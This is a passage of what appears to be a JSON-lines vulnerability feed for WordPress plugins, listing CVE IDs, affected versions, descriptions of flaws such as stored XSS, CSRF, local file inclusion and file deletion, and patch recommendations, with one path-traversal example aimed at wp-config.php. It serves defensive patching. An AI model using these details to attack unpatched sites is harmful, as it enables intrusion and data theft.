version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a63b2091-1502-4d9f-98c4-ce9d2f923dc4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a63b2091-1502-4d9f-98c4-ce9d2f923dc4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8\\\/classes\\\/lcg-adl-metabox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8\\\/classes\\\/lcg-adl-metabox.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8\\\/classes\\\/lcg-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8\\\/classes\\\/lcg-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8&old=3045923&new_path=\\\/logo-showcase-ultimate\\\/tags\\\/1.3.9&new=3045923&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8&old=3045923&new_path=\\\/logo-showcase-ultimate\\\/tags\\\/1.3.9&new=3045923&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12206","slug":"pearl-header-builder","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The WordPress Header Builder Plugin \u2013 Pearl plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.8. This is due to missing or incorrect nonce validation on the stm_header_builder page. This makes it possible for unauthenticated attackers to delete arbitrary headers via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218670%40pearl-header-builder&new=3218670%40pearl-header-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218670%40pearl-header-builder&new=3218670%40pearl-header-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4de0d05f-2f51-4fea-9520-ff07a882d95e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4de0d05f-2f51-4fea-9520-ff07a882d95e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5237","slug":"memberlite-shortcodes","versionEndExcluding":"1.3.9","description":"The Memberlite Shortcodes WordPress plugin before 1.3.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-5237-memberlite-shortcodes-stored-xss-via-shortcode\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-5237-memberlite-shortcodes-stored-xss-via-shortcode\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a46d686c-6234-4aa8-a656-00a65c55d0b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a46d686c-6234-4aa8-a656-00a65c55d0b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5028","slug":"cm-on-demand-search-and-replace","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The CM WordPress Search And Replace Plugin WordPress plugin before 1.3.9 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bae8494-7b01-4203-a4f7-ccc60efbdda7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0bae8494-7b01-4203-a4f7-ccc60efbdda7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13443","slug":"easypromos","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The Easypromos Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Easypromos shortcode in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easypromos\\\/tags\\\/1.3.8\\\/includes\\\/functions.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easypromos\\\/tags\\\/1.3.8\\\/includes\\\/functions.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81998d01-8ae7-44ac-a22e-7bdbebee6c49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81998d01-8ae7-44ac-a22e-7bdbebee6c49?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5177","slug":"hash-elements","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The Hash Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' parameter within multiple widgets in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ba07137-f834-4f56-bcd5-0f6fde756681?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ba07137-f834-4f56-bcd5-0f6fde756681?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-elements\\\/trunk\\\/modules\\\/news-module-one\\\/widgets\\\/news-module-one.php#L720\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hash-elements\\\/trunk\\\/modules\\\/news-module-one\\\/widgets\\\/news-module-one.php#L720\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3090981%40hash-elements%2Ftrunk&old=3089165%40hash-elements%2Ftrunk&sfp_email=&sfph_mail=#file18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3090981%40hash-elements%2Ftrunk&old=3089165%40hash-elements%2Ftrunk&sfp_email=&sfph_mail=#file18\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5349","slug":"lastudio-element-kit","versionImpact":"1.3.8.1","versionEndExcluding":"1.3.9","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.8.1 via the 'map_style' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e29a67b-2b67-4cd5-a5ae-a931900c75cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e29a67b-2b67-4cd5-a5ae-a931900c75cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108501\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/addons\\\/google-maps.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108501\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/addons\\\/google-maps.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0511","slug":"royal-elementor-addons","versionImpact":"1.3.87","versionEndExcluding":"1.3.88","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the wpr_update_form_action_meta function. This makes it possible for unauthenticated attackers to post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.88, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc8bef03-51e0-4448-bddd-85300104e875?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc8bef03-51e0-4448-bddd-85300104e875?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0856","slug":"appointment-booking-calendar","versionImpact":"1.3.82","versionEndExcluding":"1.3.83","description":"The Appointment Booking Calendar WordPress plugin before 1.3.83 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding a booking to the calendar without paying.","recommendation":"Update to version 1.3.83, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb383600-0cff-4f24-8127-1fb118f0565a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eb383600-0cff-4f24-8127-1fb118f0565a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5922","slug":"royal-elementor-addons","versionImpact":"1.3.80","versionEndExcluding":"1.3.81","description":"The Royal Elementor Addons and Templates WordPress plugin before 1.3.81 does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts\/pages content","recommendation":"Update to version 1.3.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/debd8498-5770-4270-9ee1-1503e675ef34\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/debd8498-5770-4270-9ee1-1503e675ef34\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2485","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.8.7","versionEndExcluding":"1.3.8.8","description":"The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8.7 via deserialization of untrusted input from the 'dnd_upload_cf7_upload'\r\n function. This makes it possible for attackers to inject a PHP Object through a PHAR file. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. This vulnerability may be exploited by unauthenticated attackers when a form is present on the site with the file upload action. The Flamingo plugin must be installed and activated in order to exploit the vulnerability.","recommendation":"Update to version 1.3.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L844\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L844\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261964\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261964\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79ffe548-0005-4f5e-873f-a1afec64a251?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79ffe548-0005-4f5e-873f-a1afec64a251?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2328","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.8.7","versionEndExcluding":"1.3.8.8","description":"The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'dnd_remove_uploaded_files' function in all versions up to, and including, 1.3.8.7. This makes it possible for unauthenticated attackers to add arbitrary file paths (such as ..\/..\/..\/..\/wp-config.php) to uploaded files on the server, which can easily lead to remote code execution when an Administrator deletes the message. Exploiting this vulnerability requires the Flamingo plugin to be installed and activated.","recommendation":"Update to version 1.3.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261964\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3261964\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6cca7a-b8ff-4ca5-b813-e611eac07695?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f6cca7a-b8ff-4ca5-b813-e611eac07695?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12267","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.8.5","versionEndExcluding":"1.3.8.6","description":"The Drag and Drop Multiple File Upload \u2013 Contact Form 7 plugin for WordPress is vulnerable to limited arbitrary file deletion due to insufficient file path validation in the dnd_codedropz_upload_delete() function in all versions up to, and including, 1.3.8.5. This makes it possible for unauthenticated attackers to delete limited arbitrary files on the server. It is not possible to delete files like wp-config.php that would make RCE possible.","recommendation":"Update to version 1.3.8.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231973\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231973\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/trunk\\\/inc\\\/dnd-upload-cf7.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00ec7251-3be1-411a-b38e-1782d1691e18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00ec7251-3be1-411a-b38e-1782d1691e18?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13716","slug":"fx-calculators","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The Forex Calculators plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_settings_callback() function in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fx-calculators\\\/tags\\\/1.3.5\\\/forex-calculators.php#L101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fx-calculators\\\/tags\\\/1.3.5\\\/forex-calculators.php#L101\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ce8ca1-c1ae-4dda-909e-70c3b6d2b561?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49ce8ca1-c1ae-4dda-909e-70c3b6d2b561?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12272","slug":"wte-elementor-widgets","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The WP Travel Engine \u2013 Elementor Widgets | Create Travel Booking Website Using WordPress and Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.7 via several widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212458%40wte-elementor-widgets&new=3212458%40wte-elementor-widgets&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212458%40wte-elementor-widgets&new=3212458%40wte-elementor-widgets&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5142f6-36da-4715-91d2-7d6665c0efa6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5142f6-36da-4715-91d2-7d6665c0efa6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5468","slug":"pearl-header-builder","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The WordPress Header Builder Plugin \u2013 Pearl plugin for WordPress is vulnerable to unauthorized site option deletion due to a missing validation and capability checks on the stm_hb_delete() function in all versions up to, and including, 1.3.7. This makes it possible for unauthenticated attackers to delete arbitrary options that can be used to perform a denial of service attack on a site.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2e770e0-1a39-4946-838b-4fd1f1dea1c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2e770e0-1a39-4946-838b-4fd1f1dea1c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pearl-header-builder\\\/tags\\\/1.3.7\\\/includes\\\/helpers.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pearl-header-builder\\\/tags\\\/1.3.7\\\/includes\\\/helpers.php#L304\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9704","slug":"dvk-social-sharing","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The Social Sharing (by Danny) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dvk_social_sharing' shortcode in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/619ca4b6-95bb-4c87-b8db-78e6d6b79384?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/619ca4b6-95bb-4c87-b8db-78e6d6b79384?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167056%40dvk-social-sharing&new=3167056%40dvk-social-sharing&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167056%40dvk-social-sharing&new=3167056%40dvk-social-sharing&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1773","slug":"pdf-invoices-and-packing-slips-for-woocommerce","versionImpact":"1.3.7","versionEndExcluding":"1.3.8","description":"The PDF Invoices and Packing Slips For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.7 via deserialization of untrusted input via the order_id parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.3.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dc6e879-4ccf-485e-b02d-2b291e67df40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dc6e879-4ccf-485e-b02d-2b291e67df40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoices-and-packing-slips-for-woocommerce\\\/trunk\\\/includes\\\/class-apifw-front-end.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-invoices-and-packing-slips-for-woocommerce\\\/trunk\\\/includes\\\/class-apifw-front-end.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042740\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042740\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5360","slug":"royal-elementor-addons","versionImpact":"1.3.78","versionEndExcluding":"1.3.79","description":"The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.","recommendation":"Update to version 1.3.79, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/281518ff-7816-4007-b712-63aed7828b34\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/281518ff-7816-4007-b712-63aed7828b34\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3717","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.7.7","versionEndExcluding":"1.3.7.8","description":"The Drag and Drop Multiple File Upload \u2013 Contact Form 7 plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.7.7 via the '\/wp-content\/uploads\/wp_dndcf7_uploads\/wpcf7-files' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via this plugin through a form.","recommendation":"Update to version 1.3.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/153cb585-4eea-4959-85b1-2487be11f116?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/153cb585-4eea-4959-85b1-2487be11f116?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077555%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=3061101%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077555%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=3061101%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3005","slug":"lastudio-element-kit","versionImpact":"1.3.7.5","versionEndExcluding":"1.3.7.6","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's LaStudioKit Post Author widget in all versions up to, and including, 1.3.7.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544db0d5-1760-4229-8429-d2391e328304?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544db0d5-1760-4229-8429-d2391e328304?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079793\\\/lastudio-element-kit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079793\\\/lastudio-element-kit\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2249","slug":"lastudio-element-kit","versionImpact":"1.3.7.4","versionEndExcluding":"1.3.7.5","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LinkWrapper attribute found in several widgets in all versions up to, and including, 1.3.7.4 due to insufficient input sanitization and output escaping the user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5113170a-5a53-4e53-84e6-56d9ba0740ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5113170a-5a53-4e53-84e6-56d9ba0740ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3050316\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/elementor\\\/wrapper-link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3050316\\\/lastudio-element-kit\\\/trunk\\\/includes\\\/extensions\\\/elementor\\\/wrapper-link.php\",\"refsource\":\"\",\"tags\":[]}]"}
